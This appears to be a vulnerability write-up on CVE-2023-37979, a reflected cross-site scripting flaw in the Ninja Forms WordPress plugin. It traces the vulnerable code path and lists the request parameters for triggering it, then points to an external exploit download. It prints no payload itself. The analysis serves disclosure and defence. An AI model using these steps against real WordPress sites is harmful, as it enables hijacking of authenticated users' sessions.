CVE-2023-37979: WordPress Authenticated XSS in Ninja-forms Plugin
| CVE ID | CVSS Score | Discovered | Affected Plugin | Vendor | Vulnerability Type |
|---|---|---|---|---|---|
| CVE-2023-37979 |  |
27/07/2023 | WordPress | Ninja-forms | Reflected XSS |
Ninja Forms wordpress plugin
The Ninja Forms plugin is a popular tool for creating forms on WordPress websites. Many people use it, with over 800,000 active installations. However, there is a security issue called Cross-Site Scripting (XSS) that needs to be taken care of.
Let's Exploit
How Does the Exploit Work?
The exploit uses a particular part of the request that the Ninja Forms plugin sends to a file called /wp-admin/admin-ajax.php. In this request, there are different pieces of information, and one of them is called "action." When this "action" is set to "nf_batch_process," it activates some functions that can cause a Cross-Site Scripting (XSS) attack. Now, let's take a closer look at how this process works:
In the code, there is a condition that checks for two things: first, the request method must be POST, and second, there should be a parameter called method_override in the request. When you send special POST requests with the method_override parameter, it allows you to explore more possibilities and do different things.
Based on the information provided earlier, we found an action parameter that leads to nf_batch_process. Now, we are looking into the includes\AJAX\REST\BatchProcess.php file, where we came across a function called get_request_data. Inside this function, there is another if condition that checks for the presence of a data parameter in the request. If this parameter exists, the function creates a data key within the $request_data array and directly assigns the value of the data parameter to it, without properly cleaning or validating it. This lack of sanitation could potentially introduce security risks.
In the include\Abstracts\Controller.php file, there is a function called _respond that performs various checks. One of these checks ensures that the data parameter is not empty and goes through a series of if conditions that must be satisfied. The function then puts all the data into the response variable.
The problem arises from the fact that we assigned a value to the data parameter when we executed includes\AJAX\REST\BatchProcess.php. As mentioned earlier, this data is not sanitized, meaning it may contain harmful code, such as an XSS payload. If a malicious user sends such harmful data to the nf_batch_process action, it can lead to an XSS attack.
Based on the information provided, here's how we can exploit the XSS vulnerability in the Ninja Forms WordPress plugin:
- We start by sending a request to the
/wp-admin/admin-ajax.phpendpoint. - In the request, we change the value of the
actionparameter tonf_batch_process. - Additionally, we include the
method_overrideparameter in the request and set it to_respond. - We then add the
dataparameter to the request and set its value to a malicious XSS payload.
When the server responds to this request, the response will contain the malicious XSS payload. The response's content type is set to text/html, so the web browser will interpret it as HTML content and execute the embedded malicious script. This can lead to harmful consequences if a user unknowingly triggers the XSS attack while interacting with the affected page.
The response to this request contains a harmful XSS payload, and the response's content type is set to text/html. Consequently, when the response is received, the web browser executes the malicious payload, leading to potential security risks and compromising the user's browsing experience.
When a user with proper authentication visits the malicious page, it triggers an XSS attack in their web browser.
Exploit for CVE-2023-37979
If you are looking for an exploit related to the CVE-2023-37979 vulnerability, you can download it from the provided link: CVE-2023-37979. However, please note that using exploits without proper authorization may be illegal and unethical. It is essential to use such tools responsibly and only on systems you own or have explicit permission to test.